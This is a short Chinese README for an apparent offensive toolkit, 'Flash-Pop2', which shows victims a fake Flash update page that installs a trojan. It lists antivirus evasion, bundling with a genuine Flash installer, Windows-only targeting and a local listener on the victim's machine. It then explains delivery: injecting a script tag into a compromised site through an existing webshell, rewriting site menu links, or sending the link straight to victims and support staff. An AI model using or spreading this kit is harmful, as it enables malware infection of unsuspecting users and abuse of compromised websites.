Flash-Pop升级版
- flash页面能够判断当前系统是否已被安装flash马
- flash页面能够判断当前系统是否是Windows,若不是则跳转到正常或指定页面
- flash安装完成后需能跳转到正常或指定页面
- flash马能够起一个本地服务
- flash马能够免杀
- flash马能够捆绑或释放正常flash安装文件
详见Zer0ne安全研究公众号
-
下载flash-pop2项目后,进入js文件夹下修改flash.js文件中的参数
-
配置说明
- ttarget: 宝塔网站设置的域名
- target_file: flash马的下载地址
- bc_link: 要跳转到的指定页面
- pb_word: 如上图
- l_url: flash马在本地监听的http服务
- l_res: flash马在本地监听的http服务返回的响应
- a_type: 应用场景
-
flash马
-
已有webshell,可以修改网站源代码
- 修改网站源码,添加
<script src=https://flash-pop2-domain.com/js/flash.js></script>
- 修改网站源码,添加
-
没有webshell,可以修改网站菜单
- 添加或修改菜单链接为https://flash-pop2-domain.com/index.html
-
直接发送给客服或者受害者